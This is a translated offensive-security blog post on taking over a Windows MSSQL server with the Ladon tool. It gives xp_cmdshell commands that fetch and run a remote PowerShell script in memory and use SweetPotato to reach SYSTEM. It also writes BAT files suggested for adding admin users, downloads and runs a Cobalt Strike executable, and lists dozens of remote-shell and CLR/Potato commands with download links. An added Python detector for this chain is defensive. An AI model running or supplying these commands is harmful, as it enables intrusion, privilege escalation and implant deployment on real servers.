Test environment
Windows Server 2016
SQL: 13.0.1601.5
Microsoft Windows [Version 10.0.14393]
Ladon local-user privilege escalation
I tried several LPE tools found online and Defender killed them outright (signature database updated to 2021.1.19). Ladon was not killed; from an administrator account under UAC, privileges can be raised with BypassUac.
Remote loading of Ladon through MSSQL for privilege escalation
SQL queries execute with NETWORK SERVICE privileges.
Remote in-memory loading of PowerLadon for privilege escalation

```sql
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "whoami""'
```
Writing a BAT file with ECHO to run multi-line commands for privilege escalation

```sql
exec master..xp_cmdshell 'echo whoami > c:\users\public\test.bat'
```

ECHO can likewise write a command that adds an administrator user, enables 3389, and so on (apply the idea more broadly; do not stop at whoami).
Running the BAT file with SYSTEM privileges

```sql
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\test.bat""'
```
Downloading the Cobalt Strike EXE with wget

```sql
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon wget http://k8gege.org/cs.exe"'
```
Running CS with SYSTEM privileges

```sql
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\cs.exe""'
```
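From the defender's side, the chain above has a distinctive process shape: xp_cmdshell runs its command through a shell spawned directly by sqlservr.exe, and the command line carries an in-memory download cradle, a Potato impersonation call, or a script dropped into c:\users\public. The following Python is an added example (not code from the original post or the Ladon project) that scores constructed process-creation events for exactly those indicators; the tab-separated log layout and the sample lines are assumptions made for illustration.

```python
import re

# Constructed sample process-creation events (not real telemetry) in an assumed
# tab-separated layout: ParentImage <TAB> Image <TAB> CommandLine, one per line.
SAMPLE_EVENTS = (
    "C:\\MSSQL\\Binn\\sqlservr.exe\tC:\\Windows\\System32\\cmd.exe\t"
    "cmd /c powershell \"IEX (New-Object Net.WebClient).DownloadString("
    "'http://xxxx:800/Ladon.ps1'); Ladon SweetPotato whoami\"\n"
    "C:\\MSSQL\\Binn\\sqlservr.exe\tC:\\Windows\\System32\\cmd.exe\t"
    "cmd /c echo whoami > c:\\users\\public\\test.bat\n"
    "C:\\Windows\\explorer.exe\tC:\\Windows\\System32\\cmd.exe\tcmd /c dir c:\\users\\public\n"
    "C:\\MSSQL\\Binn\\sqlservr.exe\tC:\\Windows\\System32\\cmd.exe\tcmd /c sqlcmd -Q \"SELECT @@VERSION\"\n"
)

# Command-line indicators taken from the chain described in the post.
RULES = [
    ("remote_cradle", re.compile(
        r"(IEX|Invoke-Expression).{0,200}?(DownloadString|Net\.WebClient)", re.I)),
    ("potato_impersonation", re.compile(r"\b(Sweet|Bad|Efs)Potato\b", re.I)),
    ("ladon_loader", re.compile(r"\bLadon(\.ps1)?\b", re.I)),
    ("script_drop_public", re.compile(
        r"echo\s.+>\s*c:\\users\\public\\.+\.(bat|cmd|ps1)", re.I)),
]

def classify(parent_image, image, cmdline):
    """Return the indicator tags firing for one event (xp_cmdshell spawns a shell under sqlservr.exe)."""
    tags = []
    if parent_image.lower().endswith("sqlservr.exe") and image.lower().endswith(("cmd.exe", "powershell.exe")):
        tags.append("xp_cmdshell_child")
    tags += [tag for tag, pat in RULES if pat.search(cmdline)]
    return tags

def severity(tags):
    """A shell under sqlservr.exe is medium on its own; with a cradle or Potato it is high."""
    if "xp_cmdshell_child" not in tags:
        return "info" if tags else "none"
    if {"remote_cradle", "potato_impersonation"} & set(tags):
        return "high"
    return "medium"

def scan(log_text):
    """Parse tab-separated events and return one alert per event that fires a rule."""
    alerts = []
    for line in log_text.splitlines():
        parts = line.split("\t", 2)
        tags = classify(*parts) if len(parts) == 3 else []
        if tags:
            alerts.append({"cmdline": parts[2], "tags": tags, "severity": severity(tags)})
    return alerts
```

Any cmd.exe or powershell.exe child of sqlservr.exe is worth a medium alert on its own, because a production instance with xp_cmdshell disabled should never produce one.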
MSSQL database remote privilege escalation tool
```
Local:
Ladon MssqlCmd host info
Ladon MssqlCmd host open_shell
Ladon MssqlCmd host close_shell
Ladon MssqlCmd host xp_cmdshell cmdline
Ladon MssqlCmd host ws_shell cmdline
Ladon MssqlCmd host r_shell cmdline
Ladon MssqlCmd host py_shell cmdline
Ladon MssqlCmd host install_clr
Ladon MssqlCmd host uninstall_clr
Ladon MssqlCmd host clr_exec cmdline
Ladon MssqlCmd host clr_efspotato cmdline
Ladon MssqlCmd host clr_badpotato cmdline

Remote:
Ladon MssqlCmd host user pass master info
Ladon MssqlCmd host port user pass master open_shell
Ladon MssqlCmd host port user pass master close_shell
Ladon MssqlCmd host user pass master xp_cmdshell cmdline
Ladon MssqlCmd host user pass master ws_shell cmdline
Ladon MssqlCmd host user pass master r_shell cmdline
Ladon MssqlCmd host user pass master py_shell cmdline
Ladon MssqlCmd host user pass master install_clr
Ladon MssqlCmd host user pass master uninstall_clr
Ladon MssqlCmd host user pass master clr_exec cmdline
Ladon MssqlCmd host user pass master clr_efspotato cmdline
Ladon MssqlCmd host user pass master clr_badpotato cmdline
```
Cobalt Strike

```
Local host:
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host info
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host open_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host close_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host xp_cmdshell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host ws_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host r_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host py_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host install_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host uninstall_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_exec cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_efspotato cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_badpotato cmdline

Remote:
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master info
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host port user pass master open_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host port user pass master close_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master xp_cmdshell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master ws_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master r_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master py_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master install_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master uninstall_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_exec cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_efspotato cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_badpotato cmdline
```
Tool download
Latest version: http://k8gege.org/Download
Previous versions: https://github.com/k8gege/Ladon/releases
Reposting notice
K8 blog posts may be freely reposted; please credit the source when reposting! © K8gege http://k8gege.org